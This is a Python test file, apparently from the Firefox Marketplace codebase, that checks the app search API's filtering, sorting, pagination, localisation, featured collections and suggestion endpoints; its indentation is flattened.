from django.http import QueryDict
from django.test.client import RequestFactory
from mock import MagicMock, patch
from nose.tools import eq_, ok_
import amo
import mkt
import mkt.regions
from access.middleware import ACLMiddleware
from addons.models import AddonCategory, AddonDeviceType, AddonUpsell, Category
from amo.helpers import absolutify
from amo.tests import app_factory, ESTestCase, TestCase, user_factory
from mkt.api.tests.test_oauth import RestOAuth, RestOAuthClient
from mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,
COLLECTIONS_TYPE_FEATURED,
COLLECTIONS_TYPE_OPERATOR)
from mkt.collections.models import Collection
from mkt.constants import regions
from mkt.constants.features import FeatureProfile
from mkt.regions.middleware import RegionMiddleware
from mkt.search.forms import DEVICE_CHOICES_IDS
from mkt.search.serializers import SimpleESAppSerializer
from mkt.search.utils import S
from mkt.search.views import SearchView, DEFAULT_SORTING
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed, Webapp, WebappIndexer
from mkt.webapps.tasks import unindex_webapps
from tags.models import AddonTag, Tag
from translations.helpers import truncate
from users.models import UserProfile
class TestGetRegion(TestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
self.resource = SearchView()
self.factory = RequestFactory()
self.profile = UserProfile.objects.get(pk=2519)
self.user = self.profile
def region_for(self, region):
req = self.factory.get('/', ({} if region is None else
{'region': region}))
req.API = True
req.LANG = ''
req.user = self.user
req.amo_user = self.profile
RegionMiddleware().process_request(req)
ACLMiddleware().process_request(req)
return self.resource.get_region_from_request(req)
@patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
def test_get_region_all(self, mock_request_region):
geoip_fallback = regions.PE # Different than the default (restofworld).
mock_request_region.return_value = geoip_fallback
# Test string values (should return region with that slug).
eq_(self.region_for('restofworld'), regions.RESTOFWORLD)
eq_(self.region_for('us'), regions.US)
# Test fallback to request.REGION (should return GeoIP region if region
# isn't specified or is specified and empty).
eq_(self.region_for(None), geoip_fallback)
eq_(self.region_for(''), geoip_fallback)
# Test fallback to restofworld (e.g. if GeoIP fails).
with patch('mkt.regions.middleware.RegionMiddleware.'
'process_request') as mock_process_request:
eq_(self.region_for(None), regions.RESTOFWORLD)
ok_(mock_process_request.called)
def test_get_region_none(self):
eq_(self.region_for('None'), None)
def test_get_region_worldwide(self):
eq_(self.region_for('worldwide'), regions.RESTOFWORLD)
@patch('versions.models.Version.is_privileged', False)
class TestApi(RestOAuth, ESTestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.client = RestOAuthClient(None)
self.url = reverse('search-api')
self.webapp = Webapp.objects.get(pk=337141)
self.category = Category.objects.create(name='Books', slug='books',
type=amo.ADDON_WEBAPP)
self.webapp.icon_hash = 'fakehash'
self.webapp.save()
self.refresh('webapp')
def tearDown(self):
for w in Webapp.objects.all():
w.delete()
unindex_webapps(list(Webapp.with_deleted.values_list('id', flat=True)))
super(TestApi, self).tearDown()
def test_verbs(self):
self._allowed_verbs(self.url, ['get'])
def test_has_cors(self):
self.assertCORS(self.client.get(self.url), 'get')
def test_meta(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(set(res.json.keys()), set(['objects', 'meta']))
eq_(res.json['meta']['total_count'], 1)
def test_wrong_category(self):
res = self.client.get(self.url,
data={'cat': self.category.slug + 'xq'})
eq_(res.status_code, 400)
eq_(res['Content-Type'], 'application/json')
def test_wrong_weight(self):
self.category.update(weight=-1)
res = self.client.get(self.url, data={'cat': self.category.slug})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 0)
def test_wrong_sort(self):
res = self.client.get(self.url, data={'sort': 'awesomeness'})
eq_(res.status_code, 400)
def test_sort(self):
# Mocked version, to make sure we are calling ES with the parameters
# we want.
with patch('mkt.webapps.models.Webapp.from_search') as mocked_search:
mocked_qs = MagicMock()
mocked_search.return_value = mocked_qs
for api_sort, es_sort in DEFAULT_SORTING.items():
res = self.client.get(self.url, [('sort', api_sort)])
eq_(res.status_code, 200, res.content)
mocked_qs.order_by.assert_called_with(es_sort)
# Unmocked version, to make sure elasticsearch is actually accepting
# the params.
for api_sort, es_sort in DEFAULT_SORTING.items():
res = self.client.get(self.url, [('sort', api_sort)])
eq_(res.status_code, 200)
def test_right_category(self):
res = self.client.get(self.url, data={'cat': self.category.slug})
eq_(res.status_code, 200)
eq_(res.json['objects'], [])
def create(self):
AddonCategory.objects.create(addon=self.webapp, category=self.category)
self.webapp.save()
self.refresh('webapp')
def test_right_category_present(self):
self.create()
res = self.client.get(self.url, data={'cat': self.category.slug})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 1)
def test_tarako_category(self):
self.create()
# tarako-lifestyle includes books.
res = self.client.get(self.url, data={'cat': 'tarako-lifestyle'})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 1)
# tarako-games includes only games.
res = self.client.get(self.url, data={'cat': 'tarako-games'})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
# tarako-tools includes multiple categories, but not books.
res = self.client.get(self.url, data={'cat': 'tarako-tools'})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
def test_user_info_with_shared_secret(self):
user = UserProfile.objects.all()[0]
def fakeauth(auth, req, **kw):
req.user = user
req.amo_user = user
with patch('mkt.api.middleware.RestSharedSecretMiddleware'
'.process_request', fakeauth):
with self.settings(SITE_URL=''):
self.create()
res = self.client.get(self.url, data={'cat': self.category.slug})
obj = res.json['objects'][0]
assert 'user' in obj
def test_dehydrate(self):
with self.settings(SITE_URL='http://hy.fr'):
self.create()
res = self.client.get(self.url, data={'cat': self.category.slug})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
content_ratings = obj['content_ratings']
eq_(obj['absolute_url'],
absolutify(self.webapp.get_absolute_url()))
eq_(obj['app_type'], self.webapp.app_type)
eq_(content_ratings['body'], 'generic')
eq_(content_ratings['rating'], None)
eq_(content_ratings['descriptors'], [])
eq_(content_ratings['interactives'], [])
eq_(obj['current_version'], u'1.0')
eq_(obj['description'],
{'en-US': self.webapp.description.localized_string})
eq_(obj['icons']['128'], self.webapp.get_icon_url(128))
ok_(obj['icons']['128'].endswith('?modified=fakehash'))
eq_(obj['id'], long(self.webapp.id))
eq_(obj['manifest_url'], self.webapp.get_manifest_url())
eq_(obj['payment_account'], None)
self.assertApiUrlEqual(obj['privacy_policy'],
'/apps/app/337141/privacy/')
eq_(obj['public_stats'], self.webapp.public_stats)
eq_(obj['ratings'], {'average': 0.0, 'count': 0})
self.assertApiUrlEqual(obj['resource_uri'],
'/apps/app/337141/')
eq_(obj['slug'], self.webapp.app_slug)
eq_(obj['supported_locales'], ['en-US', 'es', 'pt-BR'])
eq_(obj['tags'], [])
ok_('1.0' in obj['versions'])
self.assertApiUrlEqual(obj['versions']['1.0'],
'/apps/versions/1268829/')
# These only exists if requested by a reviewer.
ok_('latest_version' not in obj)
ok_('reviewer_flags' not in obj)
@patch('mkt.webapps.models.Webapp.get_excluded_region_ids')
def test_upsell(self, get_excluded_region_ids):
get_excluded_region_ids.return_value = []
upsell = app_factory(premium_type=amo.ADDON_PREMIUM)
AddonUpsell.objects.create(free=self.webapp, premium=upsell)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, {'premium_types': 'free'})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
obj = res.json['objects'][0]
eq_(obj['upsell']['id'], upsell.id)
eq_(obj['upsell']['app_slug'], upsell.app_slug)
eq_(obj['upsell']['name'], upsell.name)
eq_(obj['upsell']['icon_url'], upsell.get_icon_url(128))
self.assertApiUrlEqual(obj['upsell']['resource_uri'],
'/apps/app/%s/' % upsell.id)
eq_(obj['upsell']['region_exclusions'], [])
upsell.delete()
unindex_webapps([upsell.id])
def test_dehydrate_regions(self):
self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url)
eq_(res.status_code, 200)
obj = res.json['objects'][0]
regions = obj['regions']
ok_(mkt.regions.BR.slug not in [r['slug'] for r in regions])
eq_(len(regions), len(mkt.regions.ALL_REGION_IDS) - 1)
def test_region_filtering(self):
self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data={'region': 'br'})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
def test_languages_filtering(self):
# This webapp's supported_locales: [u'en-US', u'es', u'pt-BR']
res = self.client.get(self.url, data={'languages': 'fr'})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
for lang in ('fr,pt-BR', 'es, pt-BR', 'es', 'pt-BR'):
res = self.client.get(self.url, data={'languages': lang})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_offline_filtering(self):
def check(offline, visible):
res = self.client.get(self.url, data={'offline': offline})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), int(visible))
# Should NOT show up in offline.
# Should show up in online.
# Should show up everywhere if not filtered.
check(offline='True', visible=False)
check(offline='False', visible=True)
check(offline='None', visible=True)
# Mark that app is capable offline.
self.webapp.update(is_packaged=True)
self.refresh('webapp')
# Should show up in offline.
# Should NOT show up in online.
# Should show up everywhere if not filtered.
check(offline='True', visible=True)
check(offline='False', visible=False)
check(offline='None', visible=True)
def test_q(self):
res = self.client.get(self.url, data={'q': 'something'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_q_num_requests(self):
es = WebappIndexer.get_es()
orig_search = es.search
es.counter = 0
def monkey_search(*args, **kwargs):
es.counter += 1
return orig_search(*args, **kwargs)
es.search = monkey_search
res = self.client.get(self.url, data={'q': 'something'})
eq_(res.status_code, 200)
eq_(res.json['meta']['total_count'], 1)
eq_(len(res.json['objects']), 1)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
# Verify only one search call was made.
eq_(es.counter, 1)
es.search = orig_search
def test_q_num_requests_no_results(self):
es = WebappIndexer.get_es()
orig_search = es.search
es.counter = 0
def monkey_search(*args, **kwargs):
es.counter += 1
return orig_search(*args, **kwargs)
es.search = monkey_search
res = self.client.get(self.url, data={'q': 'noresults'})
eq_(res.status_code, 200)
eq_(res.json['meta']['total_count'], 0)
eq_(len(res.json['objects']), 0)
# Verify only one search call was made.
eq_(es.counter, 1)
es.search = orig_search
def test_q_exact(self):
app1 = app_factory(name='test app test11')
app2 = app_factory(name='test app test21')
app3 = app_factory(name='test app test31')
self.refresh('webapp')
res = self.client.get(self.url, data={'q': 'test app test21'})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 3)
# app2 should be first since it's an exact match and is boosted higher.
obj = res.json['objects'][0]
eq_(obj['slug'], app2.app_slug)
app1.delete()
app2.delete()
app3.delete()
unindex_webapps([app1.id, app2.id, app3.id])
def test_q_is_tag(self):
Tag(tag_text='whatsupp').save_tag(self.webapp)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data={'q': 'whatsupp'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_q_is_tag_misspelled(self):
Tag(tag_text='whatsapp').save_tag(self.webapp)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data={'q': 'whatsupp'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_fuzzy_match(self):
res = self.client.get(self.url, data={'q': 'soemthing'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_icu_folding(self):
self.webapp.name = {'es': 'Páginas Amarillos'}
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data={'q': 'paginas'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_camel_case_word_splitting(self):
self.webapp.name = 'AirCombat'
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data={'q': 'air combat'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_phrase_slop(self):
self.webapp.name = {'es': 'Metro de Santiago',
'en': None}
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data={'q': 'metro santiago'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_name_localized(self):
# First test no ?lang parameter returns all localizations.
res = self.client.get(self.url, data={'q': 'something'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
eq_(obj['name'], {u'en-US': u'Something Something Steamcube!',
u'es': u'Algo Algo Steamcube!'})
# Second test that adding ?lang returns only that localization.
res = self.client.get(self.url,
data={'q': 'something', 'lang': 'es'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
eq_(obj['name'], u'Algo Algo Steamcube!')
def test_other_localized(self):
# Test fields that should be localized.
translations = {'en-US': u'Test in English',
'es': u'Test in Español'}
self.webapp.homepage = translations
self.webapp.support_email = translations
self.webapp.support_url = translations
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data={'q': 'something'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['homepage'], translations)
eq_(obj['support_email'], translations)
eq_(obj['support_url'], translations)
def test_name_localized_to_default_locale(self):
self.webapp.update(default_locale='es')
self.refresh('webapp')
# Make a request in another language that we know will fail.
res = self.client.get(self.url,
data={'q': 'something', 'lang': 'de'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
eq_(obj['name'], u'Algo Algo Steamcube!')
def test_device(self):
AddonDeviceType.objects.create(
addon=self.webapp, device_type=DEVICE_CHOICES_IDS['desktop'])
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data={'device': 'desktop'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_no_flash_on_firefoxos(self):
AddonDeviceType.objects.create(
addon=self.webapp, device_type=DEVICE_CHOICES_IDS['firefoxos'])
f = self.webapp.get_latest_file()
f.uses_flash = True
f.save()
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data={'dev': 'firefoxos'})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 0)
def test_premium_types(self):
res = self.client.get(self.url,
data={'premium_types': 'free'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_premium_types_empty(self):
res = self.client.get(self.url,
data={'premium_types': 'premium'})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
def test_multiple_premium_types(self):
res = self.client.get(self.url,
data={'premium_types': ['free', 'premium']})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_app_type_hosted(self):
res = self.client.get(self.url,
data={'app_type': 'hosted'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_app_type_packaged(self):
self.webapp.update(is_packaged=True)
self.refresh('webapp')
res = self.client.get(self.url,
data={'app_type': 'packaged'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_app_type_privileged(self):
# Override the class-decorated patch.
with patch('versions.models.Version.is_privileged', True):
self.webapp.update(is_packaged=True)
self.refresh('webapp')
res = self.client.get(self.url,
data={'app_type': 'packaged'})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 0)
res = self.client.get(self.url,
data={'app_type': 'privileged'})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_status_value_packaged(self):
# When packaged and not a reviewer we exclude latest version status.
self.webapp.update(is_packaged=True)
res = self.client.get(self.url)
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['status'], amo.STATUS_PUBLIC)
eq_('latest_version' in obj, False)
def test_addon_type_anon(self):
res = self.client.get(self.url, data={'type': 'app'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, data={'type': 'vindaloo'})
eq_(res.status_code, 400)
error = res.json['detail']
eq_(error.keys(), ['type'])
def test_word_delimiter_preserves_original(self):
self.webapp.description = {
'en-US': 'This is testing word delimiting preservation in long '
'descriptions and here is what we want to find: WhatsApp'
}
self.webapp.save()
self.reindex(Webapp, 'webapp')
res = self.client.get(self.url, data={'q': 'whatsapp'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_pagination(self):
Webapp.objects.get(pk=337141).delete()
app1 = app_factory(name='test app test1')
app2 = app_factory(name='test app test2')
app3 = app_factory(name='test app test3')
# Setting 'created' app_factory is unreliable and we need a reliable
# order.
app1.update(created=self.days_ago(1))
app2.update(created=self.days_ago(2))
app3.update(created=self.days_ago(3))
self.refresh('webapp')
res = self.client.get(self.url, data={'limit': '2', 'sort': 'created'})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 2)
eq_(int(data['objects'][0]['id']), app1.id)
eq_(int(data['objects'][1]['id']), app2.id)
eq_(data['meta']['total_count'], 3)
eq_(data['meta']['limit'], 2)
eq_(data['meta']['previous'], None)
eq_(data['meta']['offset'], 0)
next = urlparse(data['meta']['next'])
eq_(next.path, self.url)
eq_(QueryDict(next.query).dict(), {'limit': '2', 'offset': '2',
'sort': 'created'})
res = self.client.get(self.url, QueryDict(next.query).dict())
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
eq_(int(data['objects'][0]['id']), app3.id)
eq_(data['meta']['total_count'], 3)
eq_(data['meta']['limit'], 2)
prev = urlparse(data['meta']['previous'])
eq_(next.path, self.url)
eq_(QueryDict(prev.query).dict(), {'limit': '2', 'offset': '0',
'sort': 'created'})
eq_(data['meta']['offset'], 2)
eq_(data['meta']['next'], None)
def test_content_ratings_reindex(self):
self.webapp.set_content_ratings({
mkt.ratingsbodies.GENERIC: mkt.ratingsbodies.GENERIC_18
})
self.refresh('webapp')
res = self.client.get(self.url)
obj = res.json['objects'][0]
ok_(obj['content_ratings']['rating'])
def test_usk_refused_exclude(self):
geodata = self.webapp._geodata
geodata.update(region_de_usk_exclude=True)
self.reindex(Webapp, 'webapp')
res = self.client.get(self.url, {'region': 'de'})
ok_(not res.json['objects'])
def test_icon_url_never(self):
self.webapp.update(icon_hash=None)
self.refresh('webapp')
res = self.client.get(self.url)
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['icons']['64'], self.webapp.get_icon_url(64))
ok_(obj['icons']['64'].endswith('?modified=never'))
def test_tag(self):
tag1 = Tag.objects.create(tag_text='tagtagtag')
tag2 = Tag.objects.create(tag_text='tarako')
Tag.objects.create(tag_text='dummy')
AddonTag.objects.create(addon=self.webapp, tag=tag1)
AddonTag.objects.create(addon=self.webapp, tag=tag2)
self.reindex(Webapp, 'webapp')
res = self.client.get(self.url, {'tag': 'tarako'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
self.assertSetEqual(obj['tags'], ['tagtagtag', 'tarako'])
def test_ratings_sort(self):
app1 = self.webapp
app2 = app_factory()
user = user_factory()
app1._reviews.create(user=user, rating=1)
app2._reviews.create(user=user, rating=5)
self.refresh()
res = self.client.get(self.url, {'sort': 'rating'})
eq_(res.status_code, 200)
eq_(res.json['objects'][0]['id'], app2.id)
eq_(res.json['objects'][1]['id'], app1.id)
class TestApiFeatures(RestOAuth, ESTestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.client = RestOAuthClient(None)
self.url = reverse('search-api')
self.webapp = Webapp.objects.get(pk=337141)
# Pick a few common device features.
self.profile = FeatureProfile(apps=True, audio=True, fullscreen=True,
geolocation=True, indexeddb=True,
sms=True).to_signature()
self.qs = {'q': 'something', 'pro': self.profile, 'dev': 'firefoxos'}
def test_no_features(self):
# Base test to make sure we find the app.
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data=self.qs)
eq_(res.status_code, 200)
obj = json.loads(res.content)['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_one_good_feature(self):
# Enable an app feature that matches one in our profile.
self.webapp.current_version.features.update(has_geolocation=True)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data=self.qs)
eq_(res.status_code, 200)
obj = json.loads(res.content)['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_one_bad_feature(self):
# Enable an app feature that doesn't match one in our profile.
self.webapp.current_version.features.update(has_pay=True)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data=self.qs)
eq_(res.status_code, 200)
objs = json.loads(res.content)['objects']
eq_(len(objs), 0)
def test_all_good_features(self):
# Enable app features so they exactly match our device profile.
fp = FeatureProfile.from_signature(self.profile)
self.webapp.current_version.features.update(
**dict(('has_%s' % k, v) for k, v in fp.items()))
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data=self.qs)
eq_(res.status_code, 200)
obj = json.loads(res.content)['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_bad_profile_on_desktop(self):
# Enable an app feature that doesn't match one in our profile.
qs = self.qs.copy()
del qs['dev'] # Desktop doesn't send a device.
self.webapp.current_version.features.update(has_pay=True)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, data=qs)
eq_(res.status_code, 200)
obj = json.loads(res.content)['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
class BaseFeaturedTests(RestOAuth, ESTestCase):
fixtures = fixture('user_2519', 'webapp_337141')
list_url = reverse('featured-search-api')
def setUp(self):
super(BaseFeaturedTests, self).setUp()
self.cat = Category.objects.create(type=amo.ADDON_WEBAPP, slug='books')
self.app = Webapp.objects.get(pk=337141)
AddonDeviceType.objects.create(
addon=self.app, device_type=DEVICE_CHOICES_IDS['firefoxos'])
AddonCategory.objects.get_or_create(addon=self.app, category=self.cat)
self.profile = FeatureProfile(apps=True, audio=True, fullscreen=True,
geolocation=True, indexeddb=True,
sms=True).to_signature()
self.qs = {'cat': 'books', 'pro': self.profile, 'dev': 'firefoxos'}
class TestFeaturedCollections(BaseFeaturedTests):
"""
Tests to ensure that CollectionFilterSetWithFallback is being called and
its results are being added to the response.
"""
col_type = COLLECTIONS_TYPE_BASIC
prop_name = 'collections'
def setUp(self):
super(TestFeaturedCollections, self).setUp()
self.col = Collection.objects.create(
name='Hi', description='Mom', collection_type=self.col_type,
category=self.cat, is_public=True, region=mkt.regions.US.id)
self.qs['region'] = mkt.regions.US.slug
# FIXME: mock the search part, we don't care about it.
def make_request(self):
res = self.client.get(self.list_url, self.qs)
eq_(res.status_code, 200)
return res, res.json
def test_added_to_results(self):
res, json = self.make_request()
ok_(self.prop_name in res.json)
eq_(len(json[self.prop_name]), 1)
eq_(json[self.prop_name][0]['id'], self.col.id)
return res, json
def test_apps_included(self):
self.col.add_app(self.app)
self.refresh('webapp')
res, json = self.test_added_to_results()
apps = json[self.prop_name][0]['apps']
eq_(len(apps), 1)
# Make sure we are using the simplified representation for apps.
eq_(apps[0]['name'], {u'en-US': u'Something Something Steamcube!',
u'es': u'Algo Algo Steamcube!'})
ok_(not 'app_type' in apps[0])
return res, json
def test_features_filtered(self):
"""
Test that the app list is passed through feature profile filtering.
"""
self.app.current_version.features.update(has_pay=True)
self.col.add_app(self.app)
self.refresh('webapp')
res, json = self.test_added_to_results()
eq_(len(json[self.prop_name][0]['apps']), 0)
def test_device_filtered(self):
"""
Test that the app list properly filters by supported device.
"""
AddonDeviceType.objects.filter(addon=self.app).update(
device_type=DEVICE_CHOICES_IDS['desktop'])
self.col.add_app(self.app)
self.refresh('webapp')
res, json = self.test_added_to_results()
eq_(len(json[self.prop_name][0]['apps']), 0)
def test_only_public(self):
self.col2 = Collection.objects.create(
name='Col', description='Hidden', collection_type=self.col_type,
category=self.cat, is_public=False)
res, json = self.test_added_to_results()
header = 'API-Fallback-%s' % self.prop_name
ok_(not header in res)
def test_only_this_type(self):
"""
Add a second collection of a different collection type, then ensure
that it does not change the results of this collection type's property.
"""
different_type = (COLLECTIONS_TYPE_FEATURED if self.col_type ==
COLLECTIONS_TYPE_BASIC else COLLECTIONS_TYPE_BASIC)
self.col2 = Collection.objects.create(
name='Bye', description='Dad', collection_type=different_type,
category=self.cat, is_public=True)
res, json = self.test_added_to_results()
header = 'API-Fallback-%s' % self.prop_name
ok_(not header in res)
@patch('mkt.collections.serializers.CollectionMembershipField.to_native')
def test_limit(self, mock_field_to_native):
"""
Add a second collection, then ensure than the old one is not present
in the results since we are limiting at 1 collection of each type
"""
mock_field_to_native.return_value = None
self.col.add_app(self.app)
self.col = Collection.objects.create(
name='Me', description='Hello', collection_type=self.col_type,
category=self.cat, is_public=True, region=mkt.regions.US.id)
# Call standard test method. We don't care about apps here, no need to
# add some or refresh ES.
self.test_added_to_results()
# Make sure to_native() was called only once, with ES data, with the
# use_es argument.
eq_(mock_field_to_native.call_count, 1)
ok_(isinstance(mock_field_to_native.call_args[0][0], S))
eq_(mock_field_to_native.call_args[1].get('use_es', False), True)
@patch('mkt.collections.serializers.CollectionMembershipField.to_native')
def test_limit_preview(self, mock_field_to_native):
"""
Like test_limit, except we are in preview mode, so we shouldn't be
using ES for apps.
"""
mock_field_to_native.return_value = None
self.col.add_app(self.app)
self.col = Collection.objects.create(
name='Me', description='Hello', collection_type=self.col_type,
category=self.cat, is_public=True, region=mkt.regions.US.id)
# Modify the query string to include preview parameter.
self.qs['preview'] = True
# Call standard test method. We don't care about apps themselves here.
self.test_added_to_results()
# Make sure to_native() was called only once, with DB data, without the
# use_es argument (since we are in preview mode).
eq_(mock_field_to_native.call_count, 1)
ok_(isinstance(mock_field_to_native.call_args[0][0], QuerySet))
eq_(mock_field_to_native.call_args[1].get('use_es', False), False)
@patch('mkt.search.views.SearchView.get_region_from_request')
@patch('mkt.search.views.CollectionFilterSetWithFallback')
def test_collection_filterset_called(self, mock_fallback, mock_region):
"""
CollectionFilterSetWithFallback should be called 3 times, one for each
collection_type.
"""
# Mock get_region_from_request() and ensure we are not passing it as
# the query string parameter.
self.qs.pop('region', None)
mock_region.return_value = mkt.regions.SPAIN
res, json = self.make_request()
eq_(mock_fallback.call_count, 3)
# We expect all calls to contain self.qs and region parameter.
expected_args = {'region': mkt.regions.SPAIN.slug}
expected_args.update(self.qs)
for call in mock_fallback.call_args_list:
eq_(call[0][0], expected_args)
def test_fallback_usage(self):
"""
Test that the fallback mechanism is used for the collection_type we are
testing.
"""
# Request the list using region. self.col should get picked up
# because the fallback mechanism will try with region set to None.
self.col.update(region=None, carrier=None)
self.qs['region'] = mkt.regions.SPAIN.slug
self.qs['carrier'] = mkt.carriers.UNKNOWN_CARRIER.slug
res, json = self.test_added_to_results()
header = 'API-Fallback-%s' % self.prop_name
ok_(header in res)
eq_(res[header], 'region,carrier')
@patch('mkt.search.views.FeaturedSearchView.get_region_from_request')
def test_region_None(self, get_region_from_request):
get_region_from_request.return_value = None
self.test_added_to_results()
def test_tarako_category(self):
"""
Test that when passing a tarako category, collections are not included.
"""
self.qs['cat'] = 'tarako-lifestyle'
res, json = self.make_request()
ok_(not self.prop_name in res.json)
class TestFeaturedOperator(TestFeaturedCollections):
col_type = COLLECTIONS_TYPE_OPERATOR
prop_name = 'operator'
class TestFeaturedApps(TestFeaturedCollections):
col_type = COLLECTIONS_TYPE_FEATURED
prop_name = 'featured'
@patch.object(settings, 'SITE_URL', 'http://testserver')
class TestSuggestionsApi(ESTestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.url = reverse('suggestions-search-api')
self.refresh('webapp')
self.client = RestOAuthClient(None)
self.app1 = Webapp.objects.get(pk=337141)
self.app1.save()
self.app2 = app_factory(name=u'Second âpp',
description=u'Second dèsc' * 25,
icon_type='image/png',
created=self.days_ago(3))
self.refresh('webapp')
def tearDown(self):
# Cleanup to remove these from the index.
self.app1.delete()
self.app2.delete()
unindex_webapps([self.app1.id, self.app2.id])
def test_suggestions(self):
response = self.client.get(self.url, data={'lang': 'en-US'})
parsed = json.loads(response.content)
eq_(parsed[0], '')
self.assertSetEqual(
parsed[1],
[unicode(self.app1.name), unicode(self.app2.name)])
self.assertSetEqual(
parsed[2],
[unicode(self.app1.description),
unicode(truncate(self.app2.description))])
self.assertSetEqual(
parsed[3],
[absolutify(self.app1.get_detail_url()),
absolutify(self.app2.get_detail_url())])
self.assertSetEqual(
parsed[4],
[self.app1.get_icon_url(64), self.app2.get_icon_url(64)])
def test_suggestions_filtered(self):
response = self.client.get(self.url, data={'q': 'Second',
'lang': 'en-US'})
parsed = json.loads(response.content)
eq_(parsed[1], [unicode(self.app2.name)])
class TestRocketbarApi(ESTestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
self.url = reverse('rocketbar-search-api')
self.refresh('webapp')
self.client = RestOAuthClient(None)
self.profile = UserProfile.objects.get(pk=2519)
self.app1 = Webapp.objects.get(pk=337141)
self.app1.addondevicetype_set.create(device_type=amo.DEVICE_GAIA.id)
self.app1.save()
self.app2 = app_factory(name=u'Something Second Something Something',
description=u'Second dèsc' * 25,
icon_type='image/png',
icon_hash='fakehash',
created=self.days_ago(3),
manifest_url='http://rocket.example.com')
self.app2.addondevicetype_set.create(device_type=amo.DEVICE_GAIA.id)
# Add 2 installed records so this app is boosted higher than app1.
Installed.objects.create(user=self.profile, addon=self.app2)
Installed.objects.create(user=amo.tests.user_factory(),
addon=self.app2)
self.app2.save()
self.refresh('webapp')
def tearDown(self):
# Cleanup to remove these from the index.
self.app1.delete()
self.app2.delete()
